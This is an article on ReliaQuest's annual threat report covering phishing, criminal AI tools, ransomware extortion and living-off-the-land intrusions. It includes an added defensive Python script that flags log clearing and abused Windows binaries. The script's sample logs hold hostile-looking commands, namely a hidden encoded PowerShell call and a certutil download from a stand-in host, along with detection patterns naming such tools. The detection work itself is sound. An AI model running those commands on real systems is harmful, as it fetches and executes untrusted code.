AI and automation have helped organizations respond to security incidents up to 99% faster than last year, according to a new study from ReliaQuest
March 2024 by ReliaQuest
The majority of cyber-attacks against organizations are perpetrated via social engineering of employees, and criminals are using new methods
including AI to supercharge their techniques. This is according to the ReliaQuest Annual Threat Report, which contains in-depth analysis of key security incidents and research from the past year, offering insights into the threats that organizations face.
Some 71% of all attacks trick employees via phishing, and of particular concern is a sharp rise in QR code phishing, which increased 51% last year compared with the previous eight months. Employees are also being duped into downloading fake updates, often for their web browser. Drive-by compromise has traditionally been defined as the automatic download of a malicious file from a compromised website without user interaction. However, in most cases reviewed during the reporting period, user action was involved, and drive-by compromise of this kind facilitated initial access in nearly 30% of incidents.
The use of AI to accelerate these attacks is gaining significant attention on major cybercriminal forums, with growing interest in weaponizing the technology. ReliaQuest has found dedicated AI and machine-learning sections on these sites, which describe criminal alternatives to mainstream chatbots, such as FraudGPT and WormGPT, and hint at the use of these tools to develop simple malware and to craft distributed denial of service (DDoS) queries. AI systems can now replicate a voice from a short sample, and video-call deepfakes are aiding threat actors. Additionally, ReliaQuest has noted that a growing number of threat actors are automating various stages of their attacks, or the entire attack chain, particularly exploitation of Citrix Bleed (CVE-2023-4966, the NetScaler ADC and Gateway session-token disclosure flaw).
However, while AI-powered automation is being leveraged by attackers, it has also delivered a step change in defensive capabilities among organizations. AI-enabled automated workflows have allowed ReliaQuest customers to respond to threats within minutes rather than days. For example, while ReliaQuest customers using traditional approaches saw an average Mean Time to Respond (MTTR) of 2.3 days, organizations that opted to leverage some level of AI and automation saw MTTR fall to 58 minutes, which ReliaQuest reports as a 99% decrease from its 2022 figure. Even more encouraging, customers who fully leveraged AI and automation are seeing MTTR reduced to 7 minutes or less.
Financial theft stood out as the primary objective of criminals in 2023, driving 88% of customer incidents. Extortion activity increased by 74%: a record 4,819 compromised entities were named on ransomware groups' data-leak websites, with LockBit alone accounting for more than 1,000 of them.
ReliaQuest noted a significant threat from suspected nation-state actors using so-called "living off the land" (LotL) techniques, in which an intruder relies on legitimate tools already present on the victim's systems rather than dropping custom malware, leaving little for signature-based controls to catch. In such incidents threat actors seek to hide their activity via defense-evasion techniques, such as clearing event logs and abusing built-in tools such as PowerShell. In an intrusion ReliaQuest observed in April 2023, a Chinese state-sponsored threat group primarily used LotL commands to blend into a company's environment. The group's discreet LotL activity allowed access for more than a month.
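The two evasion behaviours named above, log clearing and abuse of built-in tooling, are exactly the signals a detection engineer would correlate per host. The following is an added example, not code from the report or from ReliaQuest: it scans constructed Windows-style process-creation and log-clearing events, flags the relevant ones, and escalates any host that shows log clearing alongside LotL tooling. The pipe-delimited line format and the short list of abused binaries are assumptions for illustration; event IDs 1102 (Security audit log cleared), 104 (another event log cleared) and 4688 (process created) are the standard Windows values.

```python
import re
from dataclasses import dataclass

# Constructed sample events for this example (not from the report). The
# "host|event_id|channel|message" layout is an assumption made here.
SAMPLE_LOGS = [
    "ws-0417|4688|Security|New Process: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -nop -w hidden -enc SQBFAFgA",
    "ws-0417|4688|Security|New Process: C:\\Windows\\System32\\notepad.exe",
    "ws-0417|1102|Security|The audit log was cleared. Subject: CORP\\svc-backup",
    "srv-db02|104|System|The Microsoft-Windows-PowerShell/Operational log file was cleared.",
    "srv-db02|4688|Security|New Process: C:\\Windows\\System32\\wbem\\WMIC.exe process call create cmd.exe",
    "srv-db02|4688|Security|New Process: C:\\Windows\\System32\\certutil.exe -urlcache -split -f http://203.0.113.5/a.txt",
    "ws-0418|4688|Security|New Process: C:\\Windows\\System32\\svchost.exe -k netsvcs",
]

# 1102 is written to the Security log when the audit log is cleared; 104 is
# written to the System log when any other event log is cleared.
LOG_CLEARED_IDS = {1102, 104}
PROCESS_CREATED_ID = 4688

# Deliberately short, hypothetical list of built-in binaries commonly abused
# for living-off-the-land activity. rundll32/regsvr32 also run constantly
# for legitimate reasons, so a production rule needs per-environment allowlists.
LOLBIN_RE = re.compile(r"\\(wmic|certutil|mshta|rundll32|regsvr32|bitsadmin)\.exe\b")
POWERSHELL_RE = re.compile(r"\\powershell(?:_ise)?\.exe\b")
# Flags that hide or obscure what PowerShell is doing: encoded command,
# no profile, hidden window.
PS_EVASION_RE = re.compile(r"-(?:enc|encodedcommand)\b|-nop\b|-w(?:indowstyle)?\s+hidden\b")


@dataclass(frozen=True)
class Finding:
    host: str
    event_id: int
    category: str
    message: str


def parse_line(line: str):
    """Split one pipe-delimited event into (host, event_id, channel, message)."""
    host, event_id, channel, message = line.split("|", 3)
    return host, int(event_id), channel, message


def classify(host: str, event_id: int, channel: str, message: str):
    """Return a Finding for log clearing or LotL tooling, else None."""
    low = message.lower()
    if event_id in LOG_CLEARED_IDS and "cleared" in low:
        return Finding(host, event_id, "log_cleared", message)
    if event_id == PROCESS_CREATED_ID:
        # Plain PowerShell is normal admin activity; only flag it when
        # paired with evasion-style switches.
        if POWERSHELL_RE.search(low) and PS_EVASION_RE.search(low):
            return Finding(host, event_id, "suspicious_powershell", message)
        if LOLBIN_RE.search(low):
            return Finding(host, event_id, "lolbin", message)
    return None


def scan(lines):
    """Classify every line and keep the ones that produced a finding."""
    findings = []
    for line in lines:
        finding = classify(*parse_line(line))
        if finding is not None:
            findings.append(finding)
    return findings


def hosts_to_escalate(findings):
    """Hosts showing log clearing together with LotL tooling, sorted by name."""
    categories_by_host = {}
    for f in findings:
        categories_by_host.setdefault(f.host, set()).add(f.category)
    return sorted(
        host for host, cats in categories_by_host.items()
        if "log_cleared" in cats and cats & {"suspicious_powershell", "lolbin"}
    )


if __name__ == "__main__":
    results = scan(SAMPLE_LOGS)
    for f in results:
        print(f"{f.host:10} {f.event_id:5} {f.category:22} {f.message[:60]}")
    print("escalate:", hosts_to_escalate(results))
```

The per-host correlation is the point: any single 4688 event for certutil or an encoded PowerShell command is noisy on its own, but a host that clears a log and also runs those tools within the same window is worth an analyst's attention, and the 1102/104 events are cheap to collect centrally before the intruder clears them locally.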
Michael McPherson, ReliaQuest’s Senior Vice President of Technical Operations said: "As the threat continues to evolve, defenders must stay agile, using AI and automation
to keep pace with the latest attack techniques. Time is the enemy in cybersecurity. To proactively protect against these risks, companies should maximize visibility across their networks and beyond the endpoint, fully leverage AI and automation to better understand
and use their own data, and equip their teams with the latest threat intelligence, as outlined in our recommendations. With this approach, in the next year we expect customers who fully leverage our AI and automation capabilities to contain threats within
5 minutes or less."
The ReliaQuest Annual Threat Report contains detailed remediation advice, including specific sections on stopping Business Email Compromise (BEC) attempts and ransomware attacks, as well as on social engineering and multifactor authentication (MFA) abuse. There are also sections on preventing malware-free activity and on staying on top of the latest tactics, techniques and procedures (TTPs).